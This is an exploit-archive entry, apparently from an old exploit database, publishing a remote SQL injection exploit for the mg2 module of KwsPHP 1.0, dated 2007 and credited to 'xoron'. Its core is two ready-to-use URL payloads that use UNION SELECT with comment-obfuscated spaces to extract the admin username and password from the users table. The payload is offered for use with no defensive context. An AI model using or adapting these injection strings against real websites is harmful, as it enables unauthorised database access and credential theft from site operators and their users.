[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : KwsPHP 1.0 mg2 Module Remote SQL Injection Vulnerability
# Published : 2007-10-13
# Author : xoron
# Previous Title : doop CMS <= 1.3.7 (page) Local File Inclusion Vulnerability
# Next Title : Softbiz Recipes Portal Script Remote SQL Injection Vulnerability
--------------------
KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit
--------------------
Found : xoron
--------------------
Exploit:
Name:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pseudo,3,4,5/**/from/**/users/**/where/**/id=1/*
Pass:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pass,3,4,5/**/from/**/users/**/where/**/id=1/*
--------------------
Bundan sonra hep tek, hep yek xoron..!
--------------------
# www.Syue.com [2007-10-13]